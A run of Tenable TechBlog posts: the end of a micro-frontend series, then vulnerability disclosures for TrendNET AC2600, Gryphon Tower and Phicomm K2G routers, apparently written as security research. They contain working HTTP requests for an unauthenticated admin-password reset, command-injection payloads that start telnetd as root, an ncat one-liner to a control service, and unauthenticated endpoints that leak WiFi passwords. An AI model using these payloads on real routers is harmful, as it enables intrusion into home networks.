  • Shared theme — Since we also had a global theme that all micro-apps inherited from, we could encounter styling issues when the theme was updated and apps got out of sync.
  • Vendor library update — Updating a vendor library like React, where only one version of the library can be loaded at a time.

To address these issues, we created the bootstrapper job. This job has two steps:

  1. Build — The job is run against a specific environment (qa-development, qa-staging, etc.) and pulls down a completely compiled version of the entire application.
  2. Deploy — The artifact from the build step can then be deployed to the specified environment.

Conclusion

Our new build and deployment flow was the final piece of our new architecture. Once it was in place, we were able to successfully deploy individual micro-apps to our various environments in a reliable and efficient manner. Please see the last article in this series for a quick recap of everything we learned.


8. Building & Deploying was originally published in Tenable TechBlog on Medium.

9. Wrapping Up Our Journey Implementing a Micro Frontend

We hope you now have a better understanding of how you can successfully create a micro-frontend architecture. Before we call it a day, let’s give a quick recap of what was covered.

What You Learned

  • Why We Implemented a Micro Frontend — You learned where we started, specifically what our architecture used to look like and where the problems existed. You then learned how we planned on solving those problems with a new architecture.
  • Introducing the Monorepo and NX — You learned how we combined two of our repositories into one: a monorepo. You then saw how we leveraged the NX framework to identify which part of the repository changed, so we only needed to rebuild that portion.
  • Introducing Module Federation — You learned how we leverage webpack’s module federation to break our main application into a series of smaller applications called micro-apps, the purpose of which was to build and deploy these applications independently of one another.
  • Module Federation — Managing Your Micro-Apps — You learned how we consolidated configurations and logic pertaining to our micro-apps so we could easily manage and serve them as our codebase continued to grow.
  • Module Federation — Sharing Vendor Code — You learned the importance of sharing vendor library code between applications and some related best practices.
  • Module Federation — Sharing Library Code — You learned the importance of sharing custom library code between applications and some related best practices.
  • Building and Deploying — You learned how we build and deploy our application using this new model.

Key Takeaways

If you take anything away from this series, let it be the following:

The Earlier, The Better

We can tell you from experience that implementing an architecture like this is much easier if you have the opportunity to start from scratch. If you are lucky enough to start from scratch when building out an application and are interested in a micro-frontend, laying the foundation before anything else is going to make your development experience much better.

Evaluate Before You Act

Before you decide on an architecture like this, make sure it’s really what you want. Take the time to assess your issues and how your company operates. Without company support, pulling off this approach is extremely difficult.

Only Build What Changed

Using a tool like NX is critical to a monorepo, allowing you to only rebuild those parts of the system that were impacted by a change.

Micro-Frontends Are Not For Everyone

We know this type of architecture is not for everyone, and you should truly consider what your organization needs before going down this path. However, it has been very rewarding for us, and has truly transformed how we deliver solutions to our customers.

Don’t Forget To Share

When it comes to module federation, sharing is key. Learning when and how to share code is critical to the successful implementation of this architecture.

Be Careful Of What You Share

Sharing things like state between your micro-apps is a dangerous thing in a micro-frontend architecture. Learning to put safeguards in place around these areas is critical, as well as knowing when it might be necessary to deploy all your applications at once.

Summary

We hope you enjoyed this series and learned a thing or two about the power of NX and module federation. If this article can help just one engineer avoid a mistake we made, then we’ll have done our job. Happy coding!


9. Wrapping Up Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium.

TrendNET AC2600 RCE via WAN

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore, only a subset of the issues disclosed in TRA-2021-54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, no restrictions are applied to IPv6 traffic, and IPv6 is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1

ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user-controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt the syslog config file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger the system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false

ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463
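
To see what the URL-encoded body above actually carries, the short Python sketch below decodes a shortened copy of it with the standard library. It sends nothing to any device; it only shows that the %3b sequences decode to semicolons, which place telnetd between command separators once the value reaches system(). The variable names are ours, and only a subset of the parameters is reproduced.

```python
from urllib.parse import parse_qs

# Shortened copy of the request body shown above (remaining log flags omitted).
body = (
    "ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog"
    "&reboot_type=application"
    "&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b"
    "&cameo.log.enable=1&cameo.log.server=break_config"
)

params = parse_qs(body)

# The value that ends up inside the system() call.
syslog_server = params["cameo.cameo.syslog_server"][0]

# Splitting on the decoded semicolons separates the address from the command.
injected = [part for part in syslog_server.split(";") if part]
print(syslog_server)
print(injected)
```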

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.


TrendNET AC2600 RCE via WAN was originally published in Tenable TechBlog on Medium.

Rooting Gryphon Routers via Shared VPN

🎵 This LAN is your LAN, this LAN is my LAN 🎵

Intro

In August 2021, I discovered and reported a number of vulnerabilities in the Gryphon Tower router, including several command injection vulnerabilities exploitable by an attacker on the router’s LAN. Furthermore, these vulnerabilities are exploitable via the Gryphon HomeBound VPN, a network shared by all devices which have enabled the HomeBound service.

The implications of this are that an attacker can exploit and gain complete control over victim routers from anywhere on the internet if the victim is using the Gryphon HomeBound service. From there, the attacker could pivot to attacking other devices on the victim’s home network.

In the sections below, I’ll walk through how I discovered these vulnerabilities and some potential exploits.

Initial Access

When initially setting up the Gryphon router, the Gryphon mobile application is used to scan a QR code on the base of the device. In fact, all configuration of the device thereafter uses the mobile application. There is no traditional web interface to speak of. When navigating to the device’s IP in a browser, one is greeted with a simple interface that is used for the router’s Parental Control type features, running on the Lua Configuration Interface (LuCI).

The physical Gryphon device is nicely put together. Removing the case was simple, and upon removing it we can see that Gryphon has already included a handy pin header for the universal asynchronous receiver-transmitter (UART) interface.

As in previous router work, I used JTAGulator and PuTTY to connect to the UART interface. The JTAGulator tool lets us identify the transmit/receive data (txd / rxd) pins as well as the appropriate baud rate (the symbol rate / communication speed) so we can communicate with the device.

Unfortunately the UART interface doesn’t drop us directly into a shell during normal device operation. However, while watching the boot process, we see the option to enter a “failsafe” mode.

Fs in the chat

Entering this failsafe mode does drop us into a root shell on the device, though the rest of the device’s normal startup does not take place, so no services are running. This is still an excellent advantage, however, as it allows us to grab any interesting files from the filesystem, including the code for the limited web interface.

Getting a shell via LuCI

Now that we have the code for the web interface (specifically the index.lua file at /usr/lib/lua/luci/controller/admin/) we can take a look at which urls and functions are available to us. Given that this is lua code, we do a quick ctrl-f (the most advanced of hacking techniques) for calls to os.execute(), and while most calls to it in the code are benign, our eyes are immediately drawn to the config_repeater() function.

function config_repeater()
  <snip> --removed variable setting for clarity
  cmd = "/sbin/configure_repeater.sh " .. "\"" .. ssid .. "\"" .. " " .. "\"" .. key .. "\"" .. " " .. "\"" .. hidden .. "\"" .. " " .. "\"" .. ssid5 .. "\"" .. " " .. "\"" .. key5 .. "\"" .. " " .. "\"" .. mssid .. "\"" .. " " .. "\"" .. mkey .. "\"" .. " " .. "\"" .. gssid .. "\"" .. " " .. "\"" .. gkey .. "\"" .. " " .. "\"" .. ghidden .. "\"" .. " " .. "\"" .. country .. "\"" .. " " .. "\"" .. bssid .. "\"" .. " " .. "\"" .. board .. "\"" .. " " .. "\"" .. wpa .. "\""
  os.execute(cmd)
  os.execute("touch /etc/rc_in_progress.txt")
  os.execute("/sbin/mark_router.sh 2 &")
  luci.http.header("Access-Control-Allow-Origin","*")
  luci.http.prepare_content("application/json")
  luci.http.write("{\"rc\": \"OK\"}")
end

The cmd variable in the snippet above is constructed using unsanitized user input in the form of POST parameters, and is passed directly to os.execute() in a way that would allow an attacker to easily inject commands.
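As a rough illustration of why this concatenation pattern is dangerous, the Python sketch below mimics it for a single parameter and compares it with a shell-quoted version. The sample value and the helper names are hypothetical, and the quoted variant is only a generic mitigation pattern, not a description of how Gryphon addressed the issue.

```python
import shlex

SCRIPT = "/sbin/configure_repeater.sh"


def build_cmd_unsafe(ssid: str) -> str:
    """Mimic the concatenation pattern: wrap the raw value in double quotes."""
    return SCRIPT + ' "' + ssid + '"'


def build_cmd_quoted(ssid: str) -> str:
    """Same command, but with the value shell-quoted before concatenation."""
    return SCRIPT + " " + shlex.quote(ssid)


# Hypothetical parameter value: closes the quote, then appends a command.
ssid = 'x"; id; "'

unsafe = build_cmd_unsafe(ssid)
quoted = build_cmd_quoted(ssid)
print(unsafe)   # the shell would see three separate commands here
print(quoted)   # the shell would see one command with one argument
```

Nothing is executed here; the point is only to compare the two strings a shell would receive.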

This config_repeater() function corresponds to the url http://192.168.1.1/cgi-bin/luci/rc

Line 42: the answer to life, the universe, and command injections.

Since we know our input will be passed directly to os.execute(), we can build a simple payload to get a shell. In this case, we string together commands that use wget to grab a Python reverse shell and run it.

Now that we have a shell, we can see what other services are active and listening on open ports. The most interesting of these is the controller_server service listening on port 9999.

controller_server and controller_client

controller_server is a service which listens on port 9999 of the Gryphon router. It accepts a number of commands in json format, the appropriate format for which we determined by looking at its sister binary, controller_client. The inputs expected for each controller_server operation can be seen being constructed in corresponding operations in controller_client.

Opening controller_server in Ghidra for analysis leads one fairly quickly to a large switch/case section where the potential cases correspond to numbers associated with specific operations to be run on the device.

In order to hit this switch/case statement, the input passed to the service must be a JSON object in the format {"<operationNumber>" : {"<op parameter 1>":"param 1 value", …}}.

Here, the operation number corresponds to the decimal version of the desired function from the switch/case statement, and the operation parameters and their values are in most cases passed as input to that function.

Out of curiosity, I applied the elite hacker technique of ctrl-f-ing for direct calls to system() to see whether they were using unsanitized user input. As luck would have it, many of the functions (labelled operation_xyz in the screenshot above) pass user controlled strings directly in calls to system(), meaning we just found multiple command injection vulnerabilities.

As an example, let’s look at the case for operation 0x29 (41 in decimal):

In the screenshot above, we can see that the function parses a JSON object looking for the key cmd, and concatenates the value of cmd to the string "/sbin/uci set wireless.", which is then passed directly to a call to system().

This can be trivially injected using any number of methods, the simplest being passing a string containing a semicolon. For example, a cmd value of ";id>/tmp/op41" would result in the output of the id command being written to the /tmp/op41 file.

The full payload to be sent to the controller_server service listening on port 9999 to achieve this would be {"41":{"cmd":";id>/tmp/op41"}}.
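The sketch below models this locally in Python: it serializes the request with the decimal operation number as the key, then rebuilds the string that operation 41 would hand to system(). The function names are mine, and the model covers only what is described above (a fixed prefix followed by the cmd value); it does not talk to a device.

```python
import json

UCI_PREFIX = "/sbin/uci set wireless."  # fixed prefix described above


def build_request(operation: int, params: dict) -> str:
    """Serialize a request keyed by the decimal operation number."""
    return json.dumps({str(operation): params}, separators=(",", ":"))


def command_for_op41(request: str) -> str:
    """Model of what operation 41 passes to system(): prefix + cmd value."""
    cmd = json.loads(request)["41"]["cmd"]
    return UCI_PREFIX + cmd


request = build_request(0x29, {"cmd": ";id>/tmp/op41"})
print(request)
print(command_for_op41(request))
```

The second line printed shows the semicolon splitting the string into two shell commands: the truncated uci call, and id with its output redirected.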

Additionally, the service leverages SSL/TLS, so in order to send this command using something like ncat, we would need to run the following command:

echo '{"41":{"cmd":";id>/tmp/op41"}}' | ncat --ssl <device-ip> 9999

We can use this same method against a number of the other operations as well, and could create a payload which allows us to gain a shell on the device running as root.

Fortunately, the Gryphon routers do not expose port 9999 or 80 on the WAN interface, meaning an attacker has to be on the device’s LAN to exploit the vulnerabilities. That is, unless the attacker connects to the Gryphon HomeBound VPN.

HomeBound : Your LAN is my LAN too

Gryphon HomeBound is a mobile application which, according to Gryphon, securely routes all traffic on your mobile device through your Gryphon router before it hits the internet.

In order to accomplish this, the Gryphon router connects to a VPN network which is shared amongst all devices connected to HomeBound, and connects using a static openvpn configuration file located on the router’s filesystem. An attacker can use this same openvpn configuration file to connect themselves to the HomeBound network, a class B-sized network using addresses in the 10.8.0.0/16 range.

Furthermore, the Gryphon router exposes its listening services on the tun0 interface connected to the HomeBound network. An attacker connected to the HomeBound network could leverage one of the previously mentioned vulnerabilities to attack other routers on the network, and could then pivot to attacking other devices on the individual customers’ LANs.

This puts any customer who has enabled the HomeBound service at risk of attack, since their router will be exposing vulnerable services to the HomeBound network.

In the clip below we can see an attacking machine, connected to the HomeBound VPN, running a proof of concept reverse shell against a test router which has enabled the HomeBound service.

While the HomeBound service is certainly an interesting idea for a feature in a consumer router, it is implemented in a way that leaves users’ devices vulnerable to attack.

Wrap Up

An attacker being able to execute code as root on home routers could allow them to pivot to attacking those victims’ home networks. At a time when a large portion of the world is still working from home, this poses an increased risk to both the individual’s home network and any corporate assets they may have connected.

At the time of writing, Gryphon has not released a fix for these issues. The Gryphon Tower routers are still vulnerable to several command injection vulnerabilities exploitable via LAN or via the HomeBound network. Furthermore, during our testing it appeared that once the HomeBound service has been enabled, there is no way to disable the router’s connection to the HomeBound VPN without a factory reset.

It is recommended that customers who think they may be vulnerable contact Gryphon support for further information.

Update (April 8 2022): The issues have been fixed in updated firmware versions released by Gryphon. See the Solution section of Tenable’s advisory or contact Gryphon for more information: https://www.tenable.com/security/research/tra-2021-51


Rooting Gryphon Routers via Shared VPN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

A Backdoor Lockpick

Reversing Phicomm’s Backdoor Protocols

TL;DR

  1. Phicomm’s router firmware has numerous critical vulnerabilities that can be chained together by a remote, unauthenticated attacker to gain a root shell on the device.
  2. Every Phicomm router firmware since at least 2017 exposes a cryptographically locked backdoor.
  3. I’ve analysed this backdoor’s network protocol through three distinct iterations, across eleven firmware versions.
  4. And I show how the backdoor’s cryptographic lock can be “picked” to grant a root shell to an attacker.
  5. Phicomm is no more. These devices will never be patched.
  6. Not only are Phicomm devices still on the market, but their surplus is being resold by other vendors, such as Wavlink, who occasionally neglect to reflash the device and ship it with the vulnerable Phicomm firmware.

A Phicomm in Wavlink’s Clothing

In early September, 2021, a fairly ordinary and inexpensive residential router came into the Zero Day research team’s possession.

The WAVLINK AC1200, an inexpensive WiFi Router.

It was branded as a Wavlink AC1200 WiFi Router, a model that you can find on Amazon for under $30.

When I plugged in the router and attempted to navigate the browser to its administrative interface (which, according to the sticker on the bottom of the router, should have been waiting for us at 192.168.10.1), things took an unexpected turn. The router’s DHCP server, to begin with, had assigned us an address on the 192.168.2.0/24 subnet, with 192.168.2.1 as its default gateway.

And this is what was waiting to greet me:

This doesn’t look like WAVLINK firmware…

If the Amazon reviews for the WAVLINK AC1200 are anything to go by, I wasn’t alone in this particular situation.

Quite suspicious!

With a little help from Google Translate, I set about exploring this unexpected Phicomm interface. The System Status (系统状态) page identifies the device model as K2G, hardware version A1, running firmware version 22.6.3.20.

The System Status (系统状态) page in the Phicomm firmware’s administrative web UI.

An online search for “Phicomm K2G A1” turned up a few listings for this product, which indeed bears a striking resemblance to the “WAVLINK” router we’d received from Amazon. In many cases the item was listed as “discontinued”.

This looks familiar.
A familiar looking router, with the original Phicomm branding.
Do you see the difference? (The branding is the difference.)

I take a stab at reconstructing the story of how, exactly, K2G A1 routers with Phicomm firmware made their way to the market with WAVLINK branding in the Appendix to this post, but first let’s look at a few particularly interesting vulnerabilities in this misbegotten router.

How to Get the Wifi Password

It’s never a good idea to enable remote management on a residential router, but that rarely prevents vendors from offering this feature, and there will always be users unable to resist the temptation of exposing the controls to their LAN to the Internet at large, nominally protected by a flimsy password authentication mechanism at best.

Like many other residential routers, the Phicomm K2G A1 provides this feature, and a quick perusal of Shodan shows that remote management’s been enabled on many such devices.

If the user decides to enable remote management, the UI will suggest 8181 as the default port for the administrative web interface, and 255.255.255.255 as default netmask (which will expose port 8181 to the entire WAN, which in the case of most residential networks means the Internet).

A basic Shodan search suggests that plenty of users (most of them in China) have made precisely these choices when setting up their routers.

A shodan.io search, showing some results consistent with the remote management interface on certain Phicomm routers.
A shodan.io search for “port:8181 luci”, many of whose results bear a very close resemblance to the remote-management webserver on the Phicomm K2G router.

Access to the admin panel itself requires knowledge of the password that the user chose when setting up the router. Phicomm allows the user to save several seconds and ease the burden of memory by clicking a checkbox and setting the admin password to be the same as the 2.4GHz wireless password.

The Phicomm firmware’s administrative web server exposes a number of interfaces, such as /LocalMACConfig.asp or /wirelesssetup.asp, which can be used to get and set router configuration parameters without requiring any authentication whatsoever. This is especially hazardous when remote management has been enabled, since it effectively grants administrative control of several router settings to any passer-by on the internet, and discloses some highly sensitive information.

For example, if you’re curious what devices might be connected to the router’s local area network, all you need to do is issue a request to http://10.3.3.12:8181/LocalClientList.asp?action=get (assuming 10.3.3.12 is the router’s IP address and 8181 is its remote management port):

A screenshot showing how a LAN directory can be obtained from the management webserver without authentication.
Obtaining LAN information from the Phicomm management webserver, without authentication.

Here we see the Kali and pfSense VMs I’ve connected to the Phicomm router, along with an iPad that’s spoofing its MAC address.

But suppose we’d like to connect to this LAN ourselves. If the router’s nearby, we could try to connect to one of its WiFi networks. But how do we get the password? It turns out that all you need to do is ask and the router will gladly provide it:

Screenshot showing how the WiFi passwords can be obtained without authentication.
Obtaining the WiFi passwords from the remote management service without authentication.

If the owner of that router had taken Phicomm up on its suggestion that they use the same password for both the 2.4GHz wireless network and the administrative interface, then you now have remote administrative access to the router as well.

Screenshot of the Phicomm admin panel.
Phicomm explicitly offers to set the web admin password to the 2.4GHz WiFi password.

But even if you’re not so lucky, there are a number of setting operations that the pseudo-asp endpoints enable as well.

A screenshot of the Phicomm router’s web admin UI, showing the LAN information.
The LAN information page in the administrative web UI.
A screenshot showing how to rename hosts on the target’s LAN.
You can use the unauthenticated remote management endpoint to rename hosts on the target’s LAN.
The results of this renaming attack. This is a vector for pushing potentially malicious content into the administrative web UI.

If we were feeling a little less kind, or felt that this was a network that was best avoided and decided to take matters into our own hands, we could use the same interface to ban local users from the network.

We are also able to ban users from the LAN, from the WAN, without needing any prior authentication.
What the unfortunate client sees in their browser after being banned in this way.

This type of ban only bars access to the router and the WAN, and can be easily evaded by changing the client’s MAC address.

Changing the MAC address to evade the ban.

An unbanning request for a particular MAC address can be issued by setting the BlockUser parameter to 0.

[+] Requesting url http://10.3.3.12:8181//LocalMACConfig.asp?action=set&BlockUser=0&MAC=A6%3aDC%3a5C%3aF6%3a2C%3a2B&IP=unknown&DeviceRename=kali&isBind=0&ifType=0&UpMax=0&DownMax=0&_=1642459782743
{'retMACConfigresult': {'ALREADYLOGIN': 0, 'MACConfigresult': 1}}

We see that the ban depends on the MAC address of the LAN-side client. We also see that this ban can be lifted in much the same way that it was imposed, by a WAN-side machine issuing unauthenticated requests.
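For readers who want to see exactly which parameters that request carries, here is a short Python sketch that splits the logged URL into its decoded query parameters. It is purely local string parsing, and the helper name query_params is my own.

```python
from urllib.parse import parse_qs, urlsplit

# URL copied from the log line above.
URL = (
    "http://10.3.3.12:8181//LocalMACConfig.asp?action=set&BlockUser=0"
    "&MAC=A6%3aDC%3a5C%3aF6%3a2C%3a2B&IP=unknown&DeviceRename=kali"
    "&isBind=0&ifType=0&UpMax=0&DownMax=0&_=1642459782743"
)


def query_params(url: str) -> dict:
    """Return the percent-decoded query parameters of a URL."""
    query = urlsplit(url).query
    return {name: values[0] for name, values in parse_qs(query).items()}


params = query_params(URL)
print(params["MAC"], params["BlockUser"], params["DeviceRename"])
```

The MAC parameter decodes to the colon-separated address of the LAN client, alongside the BlockUser flag and the DeviceRename value used in the renaming trick shown earlier.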

The library responsible for handling these .asp endpoints is the lighttpd module, mod_mobileapp.so. Of the 68 or so endpoints defined by the administrative interface, 18 can be triggered without requiring any authentication from the user. These include wirelesssetup.asp and any bearing the prefix Local:

LocalCheckClientNumber.asp
LocalCheckDetectFinish.asp
LocalCheckInetHealthStatus.asp
LocalCheckInetLinkStatus.asp
LocalCheckInetSpeedStatus.asp
LocalCheckInterfacelink.asp
LocalCheckNetworkType.asp
LocalCheckRouterPassword.asp
LocalCheckWIFI.asp
LocalCheckWanStatus.asp
LocalCheckWifiPassword.asp
LocalCheckWirelessStatus.asp
LocalClientList.asp
LocalIndex.asp
LocalMACConfig.asp
LocalNetworkSet.asp
LocalStartAutodetect.asp
wirelesssetup.asp
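The rule of thumb stated above (wirelesssetup.asp plus anything prefixed with Local) can be written as a one-line predicate. The Python sketch below checks it against the list; the predicate is my paraphrase of the observation, not code recovered from mod_mobileapp.so, and the counter-example name is hypothetical.

```python
UNAUTHENTICATED = [
    "LocalCheckClientNumber.asp", "LocalCheckDetectFinish.asp",
    "LocalCheckInetHealthStatus.asp", "LocalCheckInetLinkStatus.asp",
    "LocalCheckInetSpeedStatus.asp", "LocalCheckInterfacelink.asp",
    "LocalCheckNetworkType.asp", "LocalCheckRouterPassword.asp",
    "LocalCheckWIFI.asp", "LocalCheckWanStatus.asp",
    "LocalCheckWifiPassword.asp", "LocalCheckWirelessStatus.asp",
    "LocalClientList.asp", "LocalIndex.asp", "LocalMACConfig.asp",
    "LocalNetworkSet.asp", "LocalStartAutodetect.asp", "wirelesssetup.asp",
]


def needs_no_auth(endpoint: str) -> bool:
    """Paraphrase of the observed rule: Local* endpoints and wirelesssetup.asp."""
    return endpoint.startswith("Local") or endpoint == "wirelesssetup.asp"


print(len(UNAUTHENTICATED), all(needs_no_auth(e) for e in UNAUTHENTICATED))
print(needs_no_auth("SomeOtherPage.asp"))  # hypothetical endpoint name
```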

Escalating from an Authenticated Admin Session to a Root Shell on the Router

Suppose that you’ve managed to access the admin panel on a Phicomm K2G A1 router, thanks to the careless exposure of the admin password through the non-authenticated /wirelesssetup.asp?action=get endpoint. Obtaining a root shell on the device is now fairly straightforward, due to a command injection vulnerability in the Phicomm interface, which appears to already be fairly well-known among Phicomm router hackers. UpanTool has provided a comprehensive writeup documenting this attack vector (Google Translate can be helpful here, if, like me, you can’t read Chinese).

A screenshot of a post-auth command injection attack, courtesy of UpanTool.

The command injection attack is triggered by submitting the string | /usr/sbin/telnetd -l /bin/login.sh where the firmware update menu asks for a time of day at which to check for updates. The router will pass the time of day given to a shell command, which it will run with root privileges, and the pipe symbol | will instruct it to send the output of the first command to a second, which is supplied by the attacker. The injected command, /usr/sbin/telnetd -l /bin/login.sh, opens a root shell that the attacker can connect to over telnet, on port 23.

This was indeed the method I used to obtain a root shell, explore the router’s runtime environment, and download its firmware to my workstation for further analysis. (I did this the easy way, by piping each block device through gzip and over netcat to my host, and then extracting the filesystems with binwalk.)

Verification that the command injection attack documented by UpanTool works.

The first thing I wanted to do when I got there was to look at the output of netstat -tunlp to see what other services might be listening on this device.

Using netstat on the router to find which services are listening on which UDP and TCP ports.

Notice the service listening on UDP port 21210, which netstat identifies as telnetd_startup. This service provides a cryptographically locked backdoor into the router, and in the next section, we’re going to see, first, how the lock works, and second, how to pick it.

Reverse Engineering the Phicomm Backdoor

The Phicomm telnetd_startup service superficially resembles Netgear’s telnetEnable daemon, and serves a similar purpose: to allow an authorized party to activate the telnet service, which will, in turn, provide that party with a root shell on the router. What distinguishes the Phicomm backdoor is not just its elaborate challenge-and-response protocol, but that it requires that the authorized party employ a private RSA key to unlock it. This requirement, however, is not foolproof, and a critical loophole in telnetd_startup allows an attacker to “pick” the cryptographic lock without any need of the key.

Initial State

telnetd_startup begins by listening unobtrusively on UDP port 21210. Until it receives a packet containing the magic 10-byte handshake, ABCDEF1234, it will remain completely silent. Nmap will report UDP port 21210 as open|filtered, and provide no clue as to what might be listening there.

Control flow diagram of the main event loop in the telnetd_startup binary.

If the service does receive the magic handshake, it will respond with a UDP packet of its own, carrying a 16-byte buffer. An analysis of the daemon’s binary code reveals the tell-tale constants of an MD5 hash function, which would be consistent with the length of 16 bytes.
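If you would like to check the constants yourself, the Python sketch below derives MD5's four initial state words from the byte sequence given in RFC 1321 (01 23 45 67 ... 32 10, read as little-endian 32-bit words) and compares them with the values that appear in the decompiled initializer. The variable names are mine.

```python
import hashlib
import struct

# RFC 1321 gives the initial state as these sixteen bytes, low-order first.
SEED = bytes.fromhex("0123456789abcdeffedcba9876543210")
MD5_INIT = struct.unpack("<4I", SEED)

# The four constants that appear in the decompiled initializer.
DECOMPILED = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)

print([hex(word) for word in MD5_INIT])
print(MD5_INIT == DECOMPILED, hashlib.md5().digest_size)
```

Four 32-bit state words also account for the 16-byte digest length.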

Disassembly of the block of code in telnetd_startup that initializes the hasher used to produce the product-identifying message. This hasher can be recognized as MD5 by its tell-tale constants.

void md5_init(uint *context)
{
  *context = 0;
  context[2] = 0x67452301;
  context[1] = 0;
  context[3] = 0xefcdab89;
  context[4] = 0x98badcfe;
  context[5] = 0x10325476;
  return;
}

Control-flow diagram of the hashing function, recognizable as MD5.

void md5_add(uint *param_1,void *param_2,uint param_3)
{
  uint uVar1;
  uint uVar2;
  uint __n;

  uVar2 = (*param_1 << 0x17) >> 0x1a;
  uVar1 = param_3 * 8 + *param_1;
  __n = 0x40 - uVar2;
  *param_1 = uVar1;
  if (uVar1 < param_3 * 8) {
    param_1[1] = param_1[1] + 1;
  }
  param_1[1] = param_1[1] + (param_3 >> 0x1d);
  if (param_3 < __n) {
    __n = 0;
  }
  else {
    memcpy((void *)((int)param_1 + uVar2 + 0x18),param_2,__n);
    FUN_00402004(param_1 + 2,param_1 + 6);
    while( true ) {
      uVar2 = 0;
      if (param_3 < __n + 0x40) break;
      FUN_00402004(param_1 + 2,(int)param_2 + __n);
      __n = __n + 0x40;
    }
  }
  memcpy((void *)((int)param_1 + uVar2 + 0x18),(void *)((int)param_2 + __n),param_3 - __n);
  return;
}

The block of code responsible for sending the product-identifying hash back to the client that sends the router the initiating handshake token (“ABCDEF1234”).

With a bit of help and annotation, Ghidra decompiles that code block into the following C-code:

memset(&K2_COSTDOWN__VER_3.0_at_00414ba0,0,0x80);
memcpy(&K2_COSTDOWN__VER_3.0_at_00414ba0,"K2_COSTDOWN__VER_3.0",0x14);
memset(md5,0,0x58);
md5_init(md5);
md5_add(md5,&K2_COSTDOWN__VER_3.0_at_00414ba0,0x80);
md5_digest(md5,&HASH_OF_K2_COSTDOWN_at_4149a0);
MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30 = 0;
DAT_00414b74 = 0;
DAT_00414b78 = 0;
DAT_00414b7c = 0;
memcpy(&MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30,
       &HASH_OF_K2_COSTDOWN_at_4149a0,
       0x10);
sendto(SKT,
       &MD5_HASH_OF_K2_COSTDOWN_STRING_COPY_at_401d30,
       0x10,
       0,
       &src_addr,
       addrlen);
CHECK_STATE_004147e0 = 0;

The string that gets hashed here is "K2_COSTDOWN__VER_3.0", a product identification string, which is first copied into a zeroed-out buffer 128 bytes in length. This can easily be verified.
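One way to reproduce that check, sketched in Python: pad the product string with NUL bytes to 128 bytes and hash the whole buffer, as the decompiled code does with its 0x80 length argument. The function name is mine, and I'm not printing an expected digest here; compare the output against what your own device returns.

```python
import hashlib

PRODUCT_ID = b"K2_COSTDOWN__VER_3.0"
BUFFER_LEN = 0x80  # 128 bytes, the length passed to md5_add()


def product_hash(product_id: bytes = PRODUCT_ID) -> bytes:
    """MD5 over the product string copied into a zeroed 128-byte buffer."""
    padded = product_id.ljust(BUFFER_LEN, b"\x00")
    return hashlib.md5(padded).digest()


digest = product_hash()
print(digest.hex())
```

Note that the padding matters: hashing the bare 20-byte string gives a different digest from hashing the zero-padded buffer.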

Verification that the product-identifying message does indeed contain an MD5 hash of a descriptive string found in the telnetd_startup binary.

